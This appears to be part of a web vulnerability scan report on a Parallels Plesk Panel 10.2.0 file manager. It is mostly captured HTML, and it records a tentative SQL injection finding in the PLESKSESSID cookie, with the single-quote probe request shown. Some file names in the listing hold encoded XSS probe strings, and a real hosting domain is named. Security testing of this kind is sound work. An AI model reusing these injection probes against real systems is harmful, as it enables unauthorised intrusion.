title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPGfdf080d921773c427dce8684" value="3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="return bin();;lon();">3M.COM-XSS-1.JPGfdf080d921773c427dce8684</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_673db%2522a%253d%2522b%25226c91d8a7d6d" value="673db%2522a%253d%2522b%25226c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/edit/ [PLESKSESSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/edit/

Issue detail

The PLESKSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PLESKSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /plesk/client@2/domain@1/hosting/file-manager/edit/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a'; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:33:50 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:33:51 GMT
Connection: close
Content-Length: 93683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

